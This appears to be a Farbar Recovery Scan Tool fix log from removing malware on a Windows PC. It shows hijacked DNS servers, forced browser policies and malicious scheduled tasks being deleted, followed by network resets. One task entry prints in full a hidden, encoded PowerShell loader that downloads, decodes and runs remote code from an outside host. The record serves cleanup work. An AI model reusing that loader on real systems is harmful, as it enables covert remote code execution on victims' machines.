Fix result of Farbar Recovery Scan Tool (x64) Version:31-12-2015 Ran by archer (2016-01-01 13:27:27) Run:1 Running from C:\Users\archer\Desktop Loaded Profiles: archer (Available Profiles: archer & joseph.fernandez) Boot Mode: Normal ============================================== fixlist content: ***************** CreateRestorePoint: HKU\S-1-5-21-4067499190-4158452651-832932472-1001\...\Run: [grint] => C:\ProgramData\grint.exe [15127440 2015-08-31] () ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => No File ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => No File ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => No File ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => No File ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => No File ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => No File HKLM-x32\...\Run: [] => [X] CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION CHR HKU\S-1-5-21-4067499190-4158452651-832932472-1001\SOFTWARE\Policies\Google: Restriction <======= ATTENTION Tcpip\Parameters: [NameServer] 95.211.158.130 Tcpip\..\Interfaces\{89F9461E-DE3F-4C87-9154-D45861FF413D}: [NameServer] 95.211.158.130 Tcpip\..\Interfaces\{96809188-F85C-4950-ACEC-9F47446A34D7}: [NameServer] 95.211.158.130 Tcpip\..\Interfaces\{EF22C593-8E82-4C8B-BCC1-3D971D1DDFE1}: [NameServer] 95.211.158.130 Tcpip\..\Interfaces\{F941A1CB-FD6F-4471-B40D-CACDD34D0A3A}: [NameServer] 95.211.158.130 2015-12-28 19:41 - 2015-12-28 19:41 - 00019370 _____ C:\windows\System32\Tasks\{491A6DCB-2E1E-ACCF-813E-678E06910CAF} 2015-12-28 19:41 - 2015-12-28 19:41 - 00000000 ____D C:\ProgramData\{1e0eec9d-6064-0} 2015-12-28 19:41 - 2015-12-28 19:41 - 00000000 ____D C:\ProgramData\{1966dac7-1064-1} 2014-12-28 17:10 - 2015-01-06 17:51 - 0001014 _____ () C:\Users\archer\AppData\Local\7396d5af-93b3-4d36-bfec-04bbd1449761.dat 2015-09-20 19:04 - 2015-09-20 19:04 - 2696318 _____ () C:\ProgramData\8X4gFnnipSHGg.exe 2015-09-04 18:54 - 2015-08-31 13:53 - 15127440 ___SH () C:\ProgramData\grint.exe Task: {EF83657C-EF9E-4218-82A9-05747B10DB28} - System32\Tasks\{491A6DCB-2E1E-ACCF-813E-678E06910CAF} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAcABvAHIAdABuAGUAdwAuAG4AZQB0AC8AdQAvAD8AcQA9AG4AaQB3AGQASQBjAGMANgBkAHUAYwB3ADAATwBQAEcAeAA1AGcAYgA3AHIAdwBaAFgARgBYAEoAMABMAHYAbwBDAHEAWgA0AE8AQgBNAFMAeABtAEQAawBuAGYAZABUAHQAZwBwAG0AYwBIAGkAawB5AFgAVABQAGEAMwBMAFMAcQBpAHEAUwBLAGMATgBJAFAAUwBvAC0AYwBZADkALQBEAEMAUgBCAFgAawBmAHUARABWAGgAQwBSAGQAUgBLAHMASgA0AGsAZAAzAHQAVgBYADcAVAA5AHIAMgA3AGkAVgBXADIASgBlAFAAOQBFAFIANQBKAGgATQB5AGcASABoAHcATgBQAEkANgBfAEgANQBFAEgAcwBrAFIAUQBCAGcAdQBmADgATgBZAEcATABYAFYATQBMAHoAQQA5AFcAagBlAGwASwB2AGwANgBqAGwAQgBaAGgAcABVADEAOAB6ADIAZwByAEYASABXAFMAOAB6AGEASgB0AHgAUgB4AEQAZwBzAHMAcABNAEIAVwAxAEcAUQBCAEQANwBMADAAMABIAE8AUgBXAHcAbQBxAFEAZgBuAE0AbgBvAEQATwBDAEgAdQBzAHIAawBlAGwAQgBLAFUAaQBxAEkAMwBaAFoAeABUAHQAUwBNAE8AZgBvAGEAWgB2AEQAaQBZAGcASwAzAFgAWgBMAG8ARgBDAFMAYgAzADYAcAAtAG4AQwBIAGwAYQBsADQAMQBRAEgAbQBwAGcAWgB2AGkAQgByAGIANQBLAGkAVgBZAFcARQBqADkASwBYAG0ANQBJAHAAWABYAFEAWABhAEQANwBtAGwAQQB6AGkANwBYAE0AWQB3AEYAdQB2AGcAYwBvAHYAOABWAHYAUQBLAEYAUgB3AE4AbQBOAEoAdQBFAEYANgBhADQAOAAyAHUASQBVAFkASgAtAEMAcQBWAEwARgAxADcATwBuAG8AbABRAEcAWgBTAF8ARwBkAHIAQgBfAFkAbgAxAHkAVgBuAGcAVgBuADMAcABvAHMAbwBOADMAegB0AGoAdwA3AG4ASQA4AE4AMwB3AHEANQBmAHAAaQBZAGMANwA5AEgAXwBWAFcAcAA4AE0ANgBnAEUAOAB2ADIAQwBCAFYAUwBLAGQANwBhAHEAcAA2AGQAdgBBAG0ANABsAGQAWgA0AHkAMgBPADMAcwA5AFQAVABkAFAAaQBXADcAQQBzAF8ANAAyAEUAcABtAHUAUwBHAEQAcgAmAGMAPQBvAHEAegB3AFQAOABoADgAMAB0AG4ARgBQAFQAawBxAFIAQwBCAHkAVQB1AE4AegA3AHIAOQB6AEgAVwBVAG4ANAA3AFEAZAA5AF8ANQBNAEoASwBxAGcAQwBOAGgAQwBUAEsARABXADkAcQBnAEIAdQBjAHIAeQBvAC0AZwBIAEwAeAA0AGsASwBNAEQAUQBxAGsAdwBQAHgATwA5AGsAWAA3AHEATgBUAGMASABvAEQAeABNAC0AdwBtAFIATQBNAHYATQA5AGoAZABwAHEASQBFAHUATABJAHMALQBaAFQAUABCAGsAZwBkAFMAYwBZAG8AbQB3AF8AeABXAFkAMgBHAHoATwBqAEEAeABkADkANwBHAEwAZgBOAGkARgB6AEgAUABwAGcAVQBLAGEANQBoAEgAMAA5AHUAegBLAEgAXwBWAGIALQBYAHEARwBJAGYANgBLAFIAXwA1AGoANwBBADUAQgBOAEIAUgBtAGUAVgBtADIAWAAtAEcAawBPAHIAWQBOAHcAbwA1AFAASwB4AEwAaABHAEgAMQAzADAANwBHAEcAbQBZAE4AWgBEAGUATwBFAFkARQBkAGEAdQB1ADUAcAB0AGYALQBkAEUAYQBRAFgAeQB1AHMAVQBIAHoATgBKAGMANgBDAGQASQBZAEEASABrAEYAZABxAGcANQA1AFkAbQBGADUAWQBsAHgAaQBYAGQANgBwADgAWgBKAEsAUgBtAEgAYQBZAFQAMQA5AFkAMAB1AFAAawBVAEcAaQBRAG4ASgBCAFEAbQBOADkALQA3AEsASgA0AHUANgB4AEcARgBZAC0AMwBUAEMAbQB3AEYAVwAxAGsAWABiAG4ASQBPAGYAQwBoAHkAQwBGADkAcABzAFIAOABpADgASwAyAC0AawBxADcAYgBjAFIAdwBPADAARgBpAGMAaQBtAF8ATgAxAEQAMQBZAEgAUQAwAEMARwBPAE4ASwBXAGUAZQB2AEQAOABOAG4AbABSAHIAZwBBAFQAUwBGAFMAeQB5ADgAcAB5AFcAMwBaAF8AVABBAEkANgA1ADEANwB3AGYAQQA1AEUAdQBiAGIAVQA0AEEASwBnAGQAaQBuAFoATwBTAE4AegAtAHkAeQAyADEAeQA1AEMANAA0AHAAagBuADIAVQBCAE4AZwBiAGgAbwA1AG0ASQA1AHoAaABjAGYAYQA4AGMAbAB2AHYAagB0ADkANgBlAGYAbgBvAEQATQBLAFAAMgBlAG0AagBPAEgANgB0AGwAZABFAF8AawA5ADkARwAtAE0AdwBJAEEAaABoAGMAYgA3AE0ANwA5AFIANABPADkASwBSAFUAZgBtAFIAUABQAGsAdQBlAFgANgBMADIAUAB0ADcAMQBVADAAaABpAEMANwBhAFYASQBPAGMAaQBEAG8AdQBsAHgAcwBUAFcAMAB2ADcAcwBDAHQAcQBkAG8AWAB6AEUARwBPAHUATABtAEMAVwBkAHoAWgBaAFcAbwBJAEQASwB3ADYATABNAEUAQQA2ADkAMwBCAFMAaQBiAHMAbwBaAFIAcABrAG4AVQA2AG0AZgBXAFIAVQBZAFQAXwBQAHUAMwAzAHoAQgB6ADIAVAB5AGcAcwBRAGUAVAByAEwAcABSAG4AZQBJAFkASgBRAFkAYgBBAEcAYwBpAGQAcAA3ADAAbQBnADQAbABPAGwANABLAFIAVQBmADcAMABjAGYANQBNAGgARABRAEYAYwBiAHEAQQBEAEgALQBrAFAAZQBDAE0AVgBXAEsAbQBqAFgAJgByAD0ANQA5ADgANwA2ADUAMAA3ADcANgA2ADMAOAAxADMANgA5ADQANgAiADsAJABzAHQAcwBrAD0AIgB7ADQAOQAxAEEANgBEAEMAQgAtADIARQAxAEUALQBBAEMAQwBGAC0AOAAxADMARQAtADYANwA4AEUAMAA2ADkAMQAwAEMAQQBGAH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA= Task: {2C85D2D2-CA9F-456D-AD71-4F4369BD1A6B} - System32\Tasks\VoiceBook => c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107}\blackhat+%282015%29+%5b1080p%5d.exe <==== ATTENTION Task: {3959C21C-7347-4BD6-9B0B-E53839FFF249} - \Superclean -> No File <==== ATTENTION Task: C:\windows\Tasks\VoiceBook.job => c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107}\blackhat+%282015%29+%5b1080p%5d.exe <==== ATTENTION c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107} Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f RemoveProxy: CMD: netsh advfirewall reset CMD: netsh advfirewall set allprofiles state ON CMD: ipconfig /flushdns CMD: netsh winsock reset catalog CMD: netsh int ip reset c:\resetlog.txt CMD: ipconfig /release CMD: ipconfig /renew CMD: netsh int ipv4 reset CMD: netsh int ipv6 reset EmptyTemp: CMD: bitsadmin /reset /allusers ***************** Restore point was successfully created. HKU\S-1-5-21-4067499190-4158452651-832932472-1001\Software\Microsoft\Windows\CurrentVersion\Run\\grint => value removed successfully "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive1" => key removed successfully HKCR\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => key not found. "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive2" => key removed successfully HKCR\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => key not found. "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive3" => key removed successfully HKCR\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => key not found. "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive1" => key removed successfully HKCR\Wow6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => key not found. "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive2" => key removed successfully HKCR\Wow6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => key not found. "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive3" => key removed successfully HKCR\Wow6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => key not found. HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully "HKLM\SOFTWARE\Policies\Google" => key removed successfully "HKU\S-1-5-21-4067499190-4158452651-832932472-1001\SOFTWARE\Policies\Google" => key removed successfully HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\NameServer => value removed successfully HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{89F9461E-DE3F-4C87-9154-D45861FF413D}\\NameServer => value removed successfully HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{96809188-F85C-4950-ACEC-9F47446A34D7}\\NameServer => value removed successfully HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{EF22C593-8E82-4C8B-BCC1-3D971D1DDFE1}\\NameServer => value removed successfully HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{F941A1CB-FD6F-4471-B40D-CACDD34D0A3A}\\NameServer => value removed successfully C:\windows\System32\Tasks\{491A6DCB-2E1E-ACCF-813E-678E06910CAF} => moved successfully C:\ProgramData\{1e0eec9d-6064-0} => moved successfully C:\ProgramData\{1966dac7-1064-1} => moved successfully C:\Users\archer\AppData\Local\7396d5af-93b3-4d36-bfec-04bbd1449761.dat => moved successfully C:\ProgramData\8X4gFnnipSHGg.exe => moved successfully C:\ProgramData\grint.exe => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EF83657C-EF9E-4218-82A9-05747B10DB28}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EF83657C-EF9E-4218-82A9-05747B10DB28}" => key removed successfully C:\windows\System32\Tasks\{491A6DCB-2E1E-ACCF-813E-678E06910CAF} => not found. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{491A6DCB-2E1E-ACCF-813E-678E06910CAF}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C85D2D2-CA9F-456D-AD71-4F4369BD1A6B}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C85D2D2-CA9F-456D-AD71-4F4369BD1A6B}" => key removed successfully C:\windows\System32\Tasks\VoiceBook => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\VoiceBook" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3959C21C-7347-4BD6-9B0B-E53839FFF249}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3959C21C-7347-4BD6-9B0B-E53839FFF249}" => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Superclean => key not found. C:\windows\Tasks\VoiceBook.job => moved successfully c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107} => moved successfully ========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f ========= The operation completed successfully. ========= End of Reg: ========= ========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f ========= The operation completed successfully. ========= End of Reg: ========= ========= RemoveProxy: ========= HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully HKU\S-1-5-21-4067499190-4158452651-832932472-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully HKU\S-1-5-21-4067499190-4158452651-832932472-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully ========= End of RemoveProxy: ========= ========= netsh advfirewall reset ========= Ok. ========= End of CMD: ========= ========= netsh advfirewall set allprofiles state ON ========= Ok. ========= End of CMD: ========= ========= ipconfig /flushdns ========= Windows IP Configuration Successfully flushed the DNS Resolver Cache. ========= End of CMD: ========= ========= netsh winsock reset catalog ========= Sucessfully reset the Winsock Catalog. You must restart the computer in order to complete the reset. ========= End of CMD: ========= ========= netsh int ip reset c:\resetlog.txt ========= Resetting Global, OK! Resetting Interface, OK! Resetting Unicast Address, OK! Resetting Neighbor, OK! Resetting Path, OK! Resetting , failed. Access is denied. Resetting , OK! Restart the computer to complete this action. ========= End of CMD: ========= ========= ipconfig /release ========= Windows IP Configuration No operation can be performed on Local Area Connection* 3 while it has its media disconnected. No operation can be performed on Ethernet while it has its media disconnected. Wireless LAN adapter Local Area Connection* 3: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Wireless LAN adapter Wi-Fi: Connection-specific DNS Suffix . : IPv6 Address. . . . . . . . . . . : fd00:fc:8dad:d352:3121:75ac:30ff:9cbc Temporary IPv6 Address. . . . . . : fd00:fc:8dad:d352:3909:526a:67e6:df17 Link-local IPv6 Address . . . . . : fe80::3121:75ac:30ff:9cbc%5 Default Gateway . . . . . . . . . : Ethernet adapter Ethernet: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : hitronhub.home Tunnel adapter isatap.hitronhub.home: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : ========= End of CMD: ========= ========= ipconfig /renew ========= Windows IP Configuration No operation can be performed on Local Area Connection* 3 while it has its media disconnected. No operation can be performed on Ethernet while it has its media disconnected. Wireless LAN adapter Local Area Connection* 3: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Wireless LAN adapter Wi-Fi: Connection-specific DNS Suffix . : hitronhub.home IPv6 Address. . . . . . . . . . . : fd00:fc:8dad:d352:3121:75ac:30ff:9cbc Temporary IPv6 Address. . . . . . : fd00:fc:8dad:d352:3909:526a:67e6:df17 Link-local IPv6 Address . . . . . : fe80::3121:75ac:30ff:9cbc%5 IPv4 Address. . . . . . . . . . . : 192.168.0.10 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.0.1 Ethernet adapter Ethernet: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : hitronhub.home Tunnel adapter Teredo Tunneling Pseudo-Interface: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Tunnel adapter isatap.hitronhub.home: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : hitronhub.home ========= End of CMD: ========= ========= netsh int ipv4 reset ========= Resetting Interface, OK! Resetting , failed. Access is denied. Restart the computer to complete this action. ========= End of CMD: ========= ========= netsh int ipv6 reset ========= Resetting Interface, OK! Resetting Neighbor, OK! Resetting Path, OK! Resetting , failed. Access is denied. Resetting , OK! Resetting , OK! Restart the computer to complete this action. ========= End of CMD: ========= ========= bitsadmin /reset /allusers ========= BITSADMIN version 3.0 [ 7.7.9600 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows. Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets. {54A3DED1-E35B-47F0-8CCA-93C636ECC4B0} canceled. {F7F23026-8237-4287-9C85-4EA2BA3F078F} canceled. {F8167E7E-CA14-4E78-93A9-062EC9E86678} canceled. {F77EF983-F016-40DE-93FC-607F3EDC282E} canceled. 4 out of 4 jobs canceled. ========= End of CMD: ========= EmptyTemp: => 14.5 GB temporary data Removed. The system needed a reboot. ==== End of Fixlog 13:29:15 ====